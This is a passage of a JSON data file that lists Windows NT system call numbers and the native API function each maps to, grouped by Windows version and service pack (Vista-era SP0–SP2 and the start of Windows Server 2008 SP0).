"NtSetSystemTime", "365": "NtSetThreadExecutionState", "366": "NtSetTimerResolution", "367": "NtSetUuidSeed", "368": "NtSetVolumeInformationFile", "369": "NtShutdownSystem", "370": "NtShutdownWorkerFactory", "371": "NtSignalAndWaitForSingleObject", "372": "NtSinglePhaseReject", "373": "NtStartProfile", "374": "NtStartTm", "375": "NtStopProfile", "376": "NtSuspendProcess", "377": "NtSuspendThread", "378": "NtSystemDebugControl", "379": "NtTerminateJobObject", "380": "NtTestAlert", "381": "NtThawRegistry", "382": "NtThawTransactions", "383": "NtTraceControl", "384": "NtTranslateFilePath", "385": "NtUnloadDriver", "386": "NtUnloadKey", "387": "NtUnloadKey2", "388": "NtUnloadKeyEx", "389": "NtUnlockFile", "390": "NtUnlockVirtualMemory", "391": "NtVdmControl", "392": "NtWaitForDebugEvent", "393": "NtWaitForKeyedEvent", "394": "NtWaitForWorkViaWorkerFactory", "395": "NtWaitHighEventPair", "396": "NtWaitLowEventPair", "397": "NtWorkerFactoryWorkerReady"}, "SP1": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAcquireCMFViewOwnership", "103": "NtAddBootEntry", "104": "NtAddDriverEntry", "105": "NtAdjustGroupsToken", "106": "NtAlertResumeThread", "107": "NtAlertThread", "108": "NtAllocateLocallyUniqueId", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelDeviceWakeupRequest", "135": "NtCancelIoFileEx", "136": "NtCancelSynchronousIoFile", "137": "NtCommitComplete", "138": "NtCommitEnlistment", "139": "NtCommitTransaction", "140": "NtCompactKeys", "141": "NtCompareTokens", "142": "NtCompleteConnectPort", "143": "NtCompressKey", "144": "NtConnectPort", "145": "NtCreateDebugObject", "146": "NtCreateDirectoryObject", "147": "NtCreateEnlistment", "148": "NtCreateEventPair", "149": "NtCreateIoCompletion", "150": "NtCreateJobObject", "151": "NtCreateJobSet", "152": "NtCreateKeyTransacted", "153": "NtCreateKeyedEvent", "154": "NtCreateMailslotFile", "155": "NtCreateMutant", "156": "NtCreateNamedPipeFile", "157": "NtCreatePagingFile", "158": "NtCreatePort", "159": "NtCreatePrivateNamespace", "160": "NtCreateProcess", "161": "NtCreateProfile", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisplayString", "184": "NtEnumerateBootEntries", "185": "NtEnumerateDriverEntries", "186": "NtEnumerateSystemEnvironmentValuesEx", "187": "NtEnumerateTransactionObject", "188": "NtExtendSection", "189": "NtFilterToken", "190": "NtFlushInstallUILanguage", "191": "NtFlushInstructionCache", "192": "NtFlushKey", "193": "NtFlushProcessWriteBuffers", "194": "NtFlushVirtualMemory", "195": "NtFlushWriteBuffer", "196": "NtFreeUserPhysicalPages", "197": "NtFreezeRegistry", "198": "NtFreezeTransactions", "199": "NtGetContextThread", "200": "NtGetCurrentProcessorNumber", "201": "NtGetDevicePowerState", "202": "NtGetMUIRegistryInfo", "203": "NtGetNextProcess", "204": "NtGetNextThread", "205": "NtGetNlsSectionPtr", "206": "NtGetNotificationResourceManager", "207": "NtGetPlugPlayEvent", "208": "NtGetWriteWatch", "209": "NtImpersonateAnonymousToken", "210": "NtImpersonateThread", "211": "NtInitializeNlsFiles", "212": "NtInitializeRegistry", "213": "NtInitiatePowerAction", "214": "NtIsSystemResumeAutomatic", "215": "NtIsUILanguageComitted", "216": "NtListenPort", "217": "NtLoadDriver", "218": "NtLoadKey", "219": "NtLoadKey2", "220": "NtLoadKeyEx", "221": "NtLockFile", "222": "NtLockProductActivationKeys", "223": "NtLockRegistryKey", "224": "NtLockVirtualMemory", "225": "NtMakePermanentObject", "226": "NtMakeTemporaryObject", "227": "NtMapCMFModule", "228": "NtMapUserPhysicalPages", "229": "NtModifyBootEntry", "230": "NtModifyDriverEntry", "231": "NtNotifyChangeDirectoryFile", "232": "NtNotifyChangeKey", "233": "NtNotifyChangeMultipleKeys", "234": "NtOpenEnlistment", "235": "NtOpenEventPair", "236": "NtOpenIoCompletion", "237": "NtOpenJobObject", "238": "NtOpenKeyTransacted", "239": "NtOpenKeyedEvent", "240": "NtOpenMutant", "241": "NtOpenObjectAuditAlarm", "242": "NtOpenPrivateNamespace", "243": "NtOpenProcessToken", "244": "NtOpenResourceManager", "245": "NtOpenSemaphore", "246": "NtOpenSession", "247": "NtOpenSymbolicLinkObject", "248": "NtOpenThread", "249": "NtOpenTimer", "250": "NtOpenTransaction", "251": "NtOpenTransactionManager", "252": "NtPlugPlayControl", "253": "NtPrePrepareComplete", "254": "NtPrePrepareEnlistment", "255": "NtPrepareComplete", "256": "NtPrepareEnlistment", "257": "NtPrivilegeCheck", "258": "NtPrivilegeObjectAuditAlarm", "259": "NtPrivilegedServiceAuditAlarm", "260": "NtPropagationComplete", "261": "NtPropagationFailed", "262": "NtPulseEvent", "263": "NtQueryBootEntryOrder", "264": "NtQueryBootOptions", "265": "NtQueryDebugFilterState", "266": "NtQueryDirectoryObject", "267": "NtQueryDriverEntryOrder", "268": "NtQueryEaFile", "269": "NtQueryFullAttributesFile", "270": "NtQueryInformationAtom", "271": "NtQueryInformationEnlistment", "272": "NtQueryInformationJobObject", "273": "NtQueryInformationPort", "274": "NtQueryInformationResourceManager", "275": "NtQueryInformationTransaction", "276": "NtQueryInformationTransactionManager", "277": "NtQueryInformationWorkerFactory", "278": "NtQueryInstallUILanguage", "279": "NtQueryIntervalProfile", "280": "NtQueryIoCompletion", "281": "NtQueryLicenseValue", "282": "NtQueryMultipleValueKey", "283": "NtQueryMutant", "284": "NtQueryOpenSubKeys", "285": "NtQueryOpenSubKeysEx", "286": "NtQueryPortInformationProcess", "287": "NtQueryQuotaInformationFile", "288": "NtQuerySecurityObject", "289": "NtQuerySemaphore", "290": "NtQuerySymbolicLinkObject", "291": "NtQuerySystemEnvironmentValue", "292": "NtQuerySystemEnvironmentValueEx", "293": "NtQueryTimerResolution", "294": "NtRaiseException", "295": "NtRaiseHardError", "296": "NtReadOnlyEnlistment", "297": "NtRecoverEnlistment", "298": "NtRecoverResourceManager", "299": "NtRecoverTransactionManager", "300": "NtRegisterProtocolAddressInformation", "301": "NtRegisterThreadTerminatePort", "302": "NtReleaseCMFViewOwnership", "303": "NtReleaseKeyedEvent", "304": "NtReleaseWorkerFactoryWorker", "305": "NtRemoveIoCompletionEx", "306": "NtRemoveProcessDebug", "307": "NtRenameKey", "308": "NtRenameTransactionManager", "309": "NtReplaceKey", "310": "NtReplacePartitionUnit", "311": "NtReplyWaitReplyPort", "312": "NtRequestDeviceWakeup", "313": "NtRequestPort", "314": "NtRequestWakeupLatency", "315": "NtResetEvent", "316": "NtResetWriteWatch", "317": "NtRestoreKey", "318": "NtResumeProcess", "319": "NtRollbackComplete", "320": "NtRollbackEnlistment", "321": "NtRollbackTransaction", "322": "NtRollforwardTransactionManager", "323": "NtSaveKey", "324": "NtSaveKeyEx", "325": "NtSaveMergedKeys", "326": "NtSecureConnectPort", "327": "NtSetBootEntryOrder", "328": "NtSetBootOptions", "329": "NtSetContextThread", "330": "NtSetDebugFilterState", "331": "NtSetDefaultHardErrorPort", "332": "NtSetDefaultLocale", "333": "NtSetDefaultUILanguage", "334": "NtSetDriverEntryOrder", "335": "NtSetEaFile", "336": "NtSetHighEventPair", "337": "NtSetHighWaitLowEventPair", "338": "NtSetInformationDebugObject", "339": "NtSetInformationEnlistment", "340": "NtSetInformationJobObject", "341": "NtSetInformationKey", "342": "NtSetInformationResourceManager", "343": "NtSetInformationToken", "344": "NtSetInformationTransaction", "345": "NtSetInformationTransactionManager", "346": "NtSetInformationWorkerFactory", "347": "NtSetIntervalProfile", "348": "NtSetIoCompletion", "349": "NtSetLdtEntries", "350": "NtSetLowEventPair", "351": "NtSetLowWaitHighEventPair", "352": "NtSetQuotaInformationFile", "353": "NtSetSecurityObject", "354": "NtSetSystemEnvironmentValue", "355": "NtSetSystemEnvironmentValueEx", "356": "NtSetSystemInformation", "357": "NtSetSystemPowerState", "358": "NtSetSystemTime", "359": "NtSetThreadExecutionState", "360": "NtSetTimerResolution", "361": "NtSetUuidSeed", "362": "NtSetVolumeInformationFile", "363": "NtShutdownSystem", "364": "NtShutdownWorkerFactory", "365": "NtSignalAndWaitForSingleObject", "366": "NtSinglePhaseReject", "367": "NtStartProfile", "368": "NtStopProfile", "369": "NtSuspendProcess", "370": "NtSuspendThread", "371": "NtSystemDebugControl", "372": "NtTerminateJobObject", "373": "NtTestAlert", "374": "NtThawRegistry", "375": "NtThawTransactions", "376": "NtTraceControl", "377": "NtTranslateFilePath", "378": "NtUnloadDriver", "379": "NtUnloadKey", "380": "NtUnloadKey2", "381": "NtUnloadKeyEx", "382": "NtUnlockFile", "383": "NtUnlockVirtualMemory", "384": "NtVdmControl", "385": "NtWaitForDebugEvent", "386": "NtWaitForKeyedEvent", "387": "NtWaitForWorkViaWorkerFactory", "388": "NtWaitHighEventPair", "389": "NtWaitLowEventPair", "390": "NtWorkerFactoryWorkerReady"}, "SP2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAcquireCMFViewOwnership", "103": "NtAddBootEntry", "104": "NtAddDriverEntry", "105": "NtAdjustGroupsToken", "106": "NtAlertResumeThread", "107": "NtAlertThread", "108": "NtAllocateLocallyUniqueId", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelDeviceWakeupRequest", "135": "NtCancelIoFileEx", "136": "NtCancelSynchronousIoFile", "137": "NtCommitComplete", "138": "NtCommitEnlistment", "139": "NtCommitTransaction", "140": "NtCompactKeys", "141": "NtCompareTokens", "142": "NtCompleteConnectPort", "143": "NtCompressKey", "144": "NtConnectPort", "145": "NtCreateDebugObject", "146": "NtCreateDirectoryObject", "147": "NtCreateEnlistment", "148": "NtCreateEventPair", "149": "NtCreateIoCompletion", "150": "NtCreateJobObject", "151": "NtCreateJobSet", "152": "NtCreateKeyTransacted", "153": "NtCreateKeyedEvent", "154": "NtCreateMailslotFile", "155": "NtCreateMutant", "156": "NtCreateNamedPipeFile", "157": "NtCreatePagingFile", "158": "NtCreatePort", "159": "NtCreatePrivateNamespace", "160": "NtCreateProcess", "161": "NtCreateProfile", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisplayString", "184": "NtEnumerateBootEntries", "185": "NtEnumerateDriverEntries", "186": "NtEnumerateSystemEnvironmentValuesEx", "187": "NtEnumerateTransactionObject", "188": "NtExtendSection", "189": "NtFilterToken", "190": "NtFlushInstallUILanguage", "191": "NtFlushInstructionCache", "192": "NtFlushKey", "193": "NtFlushProcessWriteBuffers", "194": "NtFlushVirtualMemory", "195": "NtFlushWriteBuffer", "196": "NtFreeUserPhysicalPages", "197": "NtFreezeRegistry", "198": "NtFreezeTransactions", "199": "NtGetContextThread", "200": "NtGetCurrentProcessorNumber", "201": "NtGetDevicePowerState", "202": "NtGetMUIRegistryInfo", "203": "NtGetNextProcess", "204": "NtGetNextThread", "205": "NtGetNlsSectionPtr", "206": "NtGetNotificationResourceManager", "207": "NtGetPlugPlayEvent", "208": "NtGetWriteWatch", "209": "NtImpersonateAnonymousToken", "210": "NtImpersonateThread", "211": "NtInitializeNlsFiles", "212": "NtInitializeRegistry", "213": "NtInitiatePowerAction", "214": "NtIsSystemResumeAutomatic", "215": "NtIsUILanguageComitted", "216": "NtListenPort", "217": "NtLoadDriver", "218": "NtLoadKey", "219": "NtLoadKey2", "220": "NtLoadKeyEx", "221": "NtLockFile", "222": "NtLockProductActivationKeys", "223": "NtLockRegistryKey", "224": "NtLockVirtualMemory", "225": "NtMakePermanentObject", "226": "NtMakeTemporaryObject", "227": "NtMapCMFModule", "228": "NtMapUserPhysicalPages", "229": "NtModifyBootEntry", "230": "NtModifyDriverEntry", "231": "NtNotifyChangeDirectoryFile", "232": "NtNotifyChangeKey", "233": "NtNotifyChangeMultipleKeys", "234": "NtOpenEnlistment", "235": "NtOpenEventPair", "236": "NtOpenIoCompletion", "237": "NtOpenJobObject", "238": "NtOpenKeyTransacted", "239": "NtOpenKeyedEvent", "240": "NtOpenMutant", "241": "NtOpenObjectAuditAlarm", "242": "NtOpenPrivateNamespace", "243": "NtOpenProcessToken", "244": "NtOpenResourceManager", "245": "NtOpenSemaphore", "246": "NtOpenSession", "247": "NtOpenSymbolicLinkObject", "248": "NtOpenThread", "249": "NtOpenTimer", "250": "NtOpenTransaction", "251": "NtOpenTransactionManager", "252": "NtPlugPlayControl", "253": "NtPrePrepareComplete", "254": "NtPrePrepareEnlistment", "255": "NtPrepareComplete", "256": "NtPrepareEnlistment", "257": "NtPrivilegeCheck", "258": "NtPrivilegeObjectAuditAlarm", "259": "NtPrivilegedServiceAuditAlarm", "260": "NtPropagationComplete", "261": "NtPropagationFailed", "262": "NtPulseEvent", "263": "NtQueryBootEntryOrder", "264": "NtQueryBootOptions", "265": "NtQueryDebugFilterState", "266": "NtQueryDirectoryObject", "267": "NtQueryDriverEntryOrder", "268": "NtQueryEaFile", "269": "NtQueryFullAttributesFile", "270": "NtQueryInformationAtom", "271": "NtQueryInformationEnlistment", "272": "NtQueryInformationJobObject", "273": "NtQueryInformationPort", "274": "NtQueryInformationResourceManager", "275": "NtQueryInformationTransaction", "276": "NtQueryInformationTransactionManager", "277": "NtQueryInformationWorkerFactory", "278": "NtQueryInstallUILanguage", "279": "NtQueryIntervalProfile", "280": "NtQueryIoCompletion", "281": "NtQueryLicenseValue", "282": "NtQueryMultipleValueKey", "283": "NtQueryMutant", "284": "NtQueryOpenSubKeys", "285": "NtQueryOpenSubKeysEx", "286": "NtQueryPortInformationProcess", "287": "NtQueryQuotaInformationFile", "288": "NtQuerySecurityObject", "289": "NtQuerySemaphore", "290": "NtQuerySymbolicLinkObject", "291": "NtQuerySystemEnvironmentValue", "292": "NtQuerySystemEnvironmentValueEx", "293": "NtQueryTimerResolution", "294": "NtRaiseException", "295": "NtRaiseHardError", "296": "NtReadOnlyEnlistment", "297": "NtRecoverEnlistment", "298": "NtRecoverResourceManager", "299": "NtRecoverTransactionManager", "300": "NtRegisterProtocolAddressInformation", "301": "NtRegisterThreadTerminatePort", "302": "NtReleaseCMFViewOwnership", "303": "NtReleaseKeyedEvent", "304": "NtReleaseWorkerFactoryWorker", "305": "NtRemoveIoCompletionEx", "306": "NtRemoveProcessDebug", "307": "NtRenameKey", "308": "NtRenameTransactionManager", "309": "NtReplaceKey", "310": "NtReplacePartitionUnit", "311": "NtReplyWaitReplyPort", "312": "NtRequestDeviceWakeup", "313": "NtRequestPort", "314": "NtRequestWakeupLatency", "315": "NtResetEvent", "316": "NtResetWriteWatch", "317": "NtRestoreKey", "318": "NtResumeProcess", "319": "NtRollbackComplete", "320": "NtRollbackEnlistment", "321": "NtRollbackTransaction", "322": "NtRollforwardTransactionManager", "323": "NtSaveKey", "324": "NtSaveKeyEx", "325": "NtSaveMergedKeys", "326": "NtSecureConnectPort", "327": "NtSetBootEntryOrder", "328": "NtSetBootOptions", "329": "NtSetContextThread", "330": "NtSetDebugFilterState", "331": "NtSetDefaultHardErrorPort", "332": "NtSetDefaultLocale", "333": "NtSetDefaultUILanguage", "334": "NtSetDriverEntryOrder", "335": "NtSetEaFile", "336": "NtSetHighEventPair", "337": "NtSetHighWaitLowEventPair", "338": "NtSetInformationDebugObject", "339": "NtSetInformationEnlistment", "340": "NtSetInformationJobObject", "341": "NtSetInformationKey", "342": "NtSetInformationResourceManager", "343": "NtSetInformationToken", "344": "NtSetInformationTransaction", "345": "NtSetInformationTransactionManager", "346": "NtSetInformationWorkerFactory", "347": "NtSetIntervalProfile", "348": "NtSetIoCompletion", "349": "NtSetLdtEntries", "350": "NtSetLowEventPair", "351": "NtSetLowWaitHighEventPair", "352": "NtSetQuotaInformationFile", "353": "NtSetSecurityObject", "354": "NtSetSystemEnvironmentValue", "355": "NtSetSystemEnvironmentValueEx", "356": "NtSetSystemInformation", "357": "NtSetSystemPowerState", "358": "NtSetSystemTime", "359": "NtSetThreadExecutionState", "360": "NtSetTimerResolution", "361": "NtSetUuidSeed", "362": "NtSetVolumeInformationFile", "363": "NtShutdownSystem", "364": "NtShutdownWorkerFactory", "365": "NtSignalAndWaitForSingleObject", "366": "NtSinglePhaseReject", "367": "NtStartProfile", "368": "NtStopProfile", "369": "NtSuspendProcess", "370": "NtSuspendThread", "371": "NtSystemDebugControl", "372": "NtTerminateJobObject", "373": "NtTestAlert", "374": "NtThawRegistry", "375": "NtThawTransactions", "376": "NtTraceControl", "377": "NtTranslateFilePath", "378": "NtUnloadDriver", "379": "NtUnloadKey", "380": "NtUnloadKey2", "381": "NtUnloadKeyEx", "382": "NtUnlockFile", "383": "NtUnlockVirtualMemory", "384": "NtVdmControl", "385": "NtWaitForDebugEvent", "386": "NtWaitForKeyedEvent", "387": "NtWaitForWorkViaWorkerFactory", "388": "NtWaitHighEventPair", "389": "NtWaitLowEventPair", "390": "NtWorkerFactoryWorkerReady"}}, "Windows Server 2008": {"SP0": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAcquireCMFViewOwnership", "103": "NtAddBootEntry", "104": "NtAddDriverEntry", "105": "NtAdjustGroupsToken", "106": "NtAlertResumeThread", "107": "NtAlertThread", "108": "NtAllocateLocallyUniqueId", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": 